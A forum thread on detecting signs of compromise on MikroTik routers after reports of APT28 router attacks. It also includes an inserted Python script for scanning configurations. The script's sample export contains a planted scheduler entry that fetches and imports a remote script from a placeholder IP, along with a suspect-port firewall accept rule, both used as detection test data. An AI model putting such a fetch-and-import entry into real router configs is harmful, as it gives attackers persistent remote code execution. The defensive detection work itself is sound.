Can I detect Indicators of Compromise for recent APT28 attacks on Mikrotik devices?

News has recently circulated that a Russian hacking group called APT28 has apparently been attacking TP-Link and Mikrotik devices for some time (see link).

Mikrotik devices seem to be the exception, but I'm still curious: how would I detect Indicators of Compromise on my Mikrotik router?

For reference:

https://mikrotik.com/supportsec/winbox-vulnerability/

https://mikrotik.com/supportsec/meris-botnet/

  • lack of firewall on WAN side of network (opened ports)
  • allowing everything from LAN to the router also isn’t a good idea nowadays
  • weak passwords

These are old attacks.

What we have observed happened early this morning across dozens of devices. Many of them had no service ports exposed to the internet (and in others, access was filtered via /ip services).

Observed behavior:

  • PPPoE clients showing 3–4 sessions per user.
    If you disconnect them, they reappear with the same uptime they previously had.
    Disabling the PPPoE server does not change anything.

  • CPU usage above 80%

  • Firewall rules in input chain allowing TCP connections to ports 1080, 7777, and 8888, without any prior login traces

  • 2 supout files created

  • All actions under System > Logging changed to "disk"

All of this activity was detected around 03:00 AM, while the CPU load and PPPoE issues started around 05:00 AM.

After a reboot, everything appears to return to normal.

So far, all affected devices are CCR Tilera running RouterOS 6.4x.


And they are still in the field if the router is not patched/upgraded and still runs affected versions.
It may sound surrealistic, but I’ve spotted several devices running like that in 2025.

Refer to the actual ncsc.gov.uk advisory:
https://www.ncsc.gov.uk/news/apt28-exploit-routers-to-enable-dns-hijacking-operations

The list of affected router models is, however, TP-LINK only at the moment, even if Mikrotik is cited; it seems like TP-LINK routers were hacked to conduct attacks against Mikrotik devices in Ukraine.

And it seems like affected ports are different.

We have the same indicators in many routers, which apparently do not have services exposed/open to the internet, but we have not found any change in the configuration.

Although the PPPoE server configuration is set to "one session per host", the same authenticated MAC address is seen up to 4 times.

Has anyone else noticed these behaviors?

I can confirm that several colleagues in the sector are reporting the same issue: their PPPoE servers started multiplying client sessions, exhausting the IP pools and causing service outages for users. The routers I have been able to review are properly secured, with no management ports exposed to the Internet. In all cases, the affected versions belong to the 6.x series.

I have sent the following email to support@mikrotik.com, but I am not very optimistic about receiving a response:

”Dear MikroTik Support Team,

I work as a consultant and ISP specializing in MikroTik environments. I would like to bring to your attention an incident we recently encountered which, due to its characteristics, we believe warrants further analysis.

During the early hours of the morning, around 03:00 AM, between Tuesday and Wednesday, several ISP networks across Spain began experiencing unusual behavior in their routers. These infrastructures are completely independent from one another, with no operational or network relationship, which makes the situation particularly striking.

In all cases, the affected devices were MikroTik routers running the latest stable release of the v6 branch. Suddenly, multiple additional PPPoE sessions started to appear. These sessions were not replacing existing ones; instead, they accumulated progressively, eventually exhausting the available IP address pools within each network.

It is important to note that all environments were properly secured. No inbound access was allowed, either due to strict firewall rules or because the routers were located behind upstream NAT devices with no open ports. In other words, only outbound traffic was permitted.

The only effective way to restore normal operation was to reboot the affected devices. Due to the direct impact on customer connectivity — as these are ISPs serving a significant number of subscribers — immediate action was required, which unfortunately prevented us from collecting more detailed diagnostic data. No supout.rif files were generated, and the available logs were not useful, as the logging buffer quickly became saturated with connection-related errors.

Additionally, after discussing this issue with other professionals in the sector here in Spain, we have confirmed that they have experienced the same problem in their own networks.

The fact that this behavior occurred almost simultaneously across completely independent networks leads us to suspect a possible software-related issue or an external triggering factor.

We would greatly appreciate your insight on whether similar incidents have been reported, as well as any recommendations you may have for preventing such situations or improving data collection should the issue occur again.

Please let me know if you require any additional technical details.

Thank you very much for your support”


Indeed… came across a hAP lite running a very old version just last week… more importantly, I was unable to upgrade it due to lack of memory. Fortunately, it was just being used as an internal switch, so the risk is hopefully low.

It may indicate an attack from some infected routers’ PPPoE clients - in this case setting “one session per host” should limit connections from the same MAC - but the question is - are the connections coming from the same MAC addresses as “valid” clients, or are there some other addresses?

Exposing your router management ports (ssh, telnet, webfig, winbox) to internet is a bad idea. NO, you don’t have a good reason to do that!

Strong passwords do not help you when there is a software vulnerability.

You are allowing multiple logins from the same user? Why? Configure that to be at most 2. So users can login when they powercycle the router and the previous login has not expired. But not unlimited.

You can try to look for Indicators of Compromise related to recent APT28 activity on MikroTik devices, but it’s not always straightforward. These attacks tend to be stealthy and may leave only subtle traces. Monitoring unusual login attempts, unexpected configuration changes, unfamiliar scripts, or suspicious outbound connections can help. It’s also a good idea to review logs regularly and compare them against known threat intelligence where available.

Very strange that NIST mentions Mikrotik explicitly in their posting but does not refer to CVEs, IOCs or models. And no public statement from Mikrotik.

My guess is Mikrotik has nothing to do with this unless there's some 0-day lurking around. But surely NIST should have synced their statement with Mikrotik.

Quotes from NCSC report:

A subset of servers in this cluster received DNS requests via likely compromised devices including models of MikroTik and TP-Link routers. The DNS requests were forwarded from these servers to further remote actor-owned servers.

This report draws on information derived from NCSC and industry sources

"Industry sources"? Which ones?

Such "clickbait" news helps to keep the focus on security at the proper level, but on the other hand it rocks the boat just for clicks. Any brand could be mentioned as "including XXX, YYY brand". One could wonder if such black PR is another kind of cyber attack, to make the particular brand less trustable. Especially if the manufacturer is based in a country the attacker is "interested" in.

The problem is that these vulnerabilities are by now from a decade ago, they have been patched, but not many router users ever update their RouterOS. So until all the sold routers have hardware failure, this story continues and will make the news and press releases from authorities over and over again.

What baffles me most is that even with all the countermeasures taken by MikroTik, which until recently have caused a lot of aggravation mainly for users who do automated deployment, there still has not been a solution to the problem “nobody ever updates their router”. When a vulnerability like this turns up again in current RouterOS, the issue will be exactly the same as it was 10 years ago: no way to make it go away except just wait another 15 years.

Yes, we have not found any indication that MikroTik devices are vulnerable. They are only mentioned in those reports as targets of attackers that are scanning for outdated MikroTik versions:

Quote: "The GRU scanned the internet for TP-Link and MikroTik routers running outdated firmware"

Of course it is possible that if your device was compromised 10 years ago, and the attacker implanted some kind of "system scheduler" script, that fetches stuff from the internet, even upgrading it might not remove it (we detect most widely known scripts, but it's hard to say which script is made by user, and which by a very old attack). So better export the full config and inspect it.
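As an added example (not code from this thread, from MikroTik, or from any of the posters), the script below does the "export the full config and inspect it" step from the reply above, together with the indicators reported earlier in the thread: input-chain accept rules for TCP 1080/7777/8888, logging actions switched to disk, scheduler entries that fetch and import from the internet, and PPPoE sessions multiplying per client. The RouterOS export and `/ppp active print` table it scans are constructed samples that approximate the RouterOS 6 output format, not captured data; the port list, the fetch/import pattern and the "one session per MAC" limit are assumptions taken from the thread, not a MikroTik-published detection rule.

```python
"""Scan a RouterOS export and an active-PPP table for the indicators discussed in the thread."""
import re
import shlex
from collections import Counter

# Constructed sample of an /export; the tcp/8888 input rule, the fetch+import
# scheduler and the disk logging actions mirror what the thread reports.
SAMPLE_EXPORT = """\
# constructed sample, RouterOS 6.x export format (approximate)
/ip firewall filter
add action=accept chain=input comment="allow established" connection-state=established,related
add action=accept chain=input dst-port=8888 protocol=tcp
add action=drop chain=input in-interface=ether1
/system scheduler
add interval=1h name=schd1 on-event="/tool fetch url=http://203.0.113.10/u.rsc mode=http; /import u.rsc" start-time=startup
add interval=1d name=backup on-event="/system backup save name=daily" start-time=02:00:00
/system logging
set 0 action=disk topics=info
set 1 action=disk topics=error
add action=disk topics=warning
"""

# Constructed sample of /ppp active print: one MAC holding three sessions.
SAMPLE_PPP_ACTIVE = """\
 # NAME     SERVICE CALLER-ID         ADDRESS        UPTIME
 0 user01   pppoe   AA:BB:CC:00:00:01 10.20.0.2      3d2h10m
 1 user02   pppoe   AA:BB:CC:00:00:02 10.20.0.3      1h2m
 2 user01   pppoe   AA:BB:CC:00:00:01 10.20.0.4      3d2h10m
 3 user01   pppoe   AA:BB:CC:00:00:01 10.20.0.5      3d2h10m
"""

SUSPECT_PORTS = {"1080", "7777", "8888"}  # ports named in the thread (assumption)


def parse_export(text):
    """Return a list of (section, verb, {key: value}) for every add/set line."""
    entries, section, buf = [], None, ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):  # RouterOS wraps long lines with a trailing backslash
            buf += line[:-1]
            continue
        line, buf = buf + line, ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):  # menu path such as /ip firewall filter
            section = line.strip()
            continue
        tokens = shlex.split(line)  # keeps quoted on-event="..." values intact
        kv = {}
        for tok in tokens[1:]:
            key, _, val = tok.partition("=")
            kv[key] = val
        entries.append((section, tokens[0], kv))
    return entries


def find_indicators(text):
    """Flag the config-level indicators described in the thread."""
    findings = []
    for section, verb, kv in parse_export(text):
        if (section == "/ip firewall filter" and kv.get("chain") == "input"
                and kv.get("action") == "accept" and kv.get("protocol") == "tcp"):
            hit = set(kv.get("dst-port", "").split(",")) & SUSPECT_PORTS
            if hit:
                findings.append(("firewall", f"input accept for tcp/{','.join(sorted(hit))}"))
        elif section == "/system scheduler":
            event = kv.get("on-event", "")
            # a scheduler that fetches and imports remote scripts is the persistence
            # mechanism the reply above warns can survive an upgrade
            if re.search(r"/tool fetch|\bimport\b", event):
                findings.append(("scheduler", f"{kv.get('name')}: {event}"))
        elif section == "/system logging" and kv.get("action") == "disk":
            findings.append(("logging", f"{verb} topics={kv.get('topics')} -> disk"))
    return findings


def duplicate_sessions(table, limit=1):
    """Count active PPP sessions per CALLER-ID (MAC) and return those above limit."""
    counts = Counter()
    for line in table.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        counts[fields[3]] += 1  # CALLER-ID column
    return {mac: n for mac, n in counts.items() if n > limit}


if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_EXPORT):
        print(f"[{kind}] {detail}")
    for mac, n in duplicate_sessions(SAMPLE_PPP_ACTIVE).items():
        print(f"[pppoe] {mac} holds {n} concurrent sessions")
```

Run it against a real `/export` saved to a file and the output of `/ppp active print` by replacing the two sample strings; a hit on the scheduler check is the one worth reading line by line, since the reply above notes that a scheduler entry planted by an old compromise is the part an upgrade does not remove.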

Only as a side note, in the list of affected TP-LINK devices there are:

TP-LINK WIRELESS N ACCESS POINT WA801ND
TP-LINK WIRELESS N ACCESS POINT WA901ND

I am familiar with these two models and they are "pure" access points with modes: access point/range extender/client/Multi-SSID. They shouldn't ever be connected directly to the internet, so if they have been compromised, this can only have happened if the "main" router has also been compromised.

Or if the compromise happens from the local network, e.g. some trojan program (could even be Java or JavaScript when bugs exist) that exploits a config webserver vulnerability by scanning the local network to find those devices.

But then the vector is another device (a PC, a server, a phone, whatever) that runs the trojan or Java/JavaScript.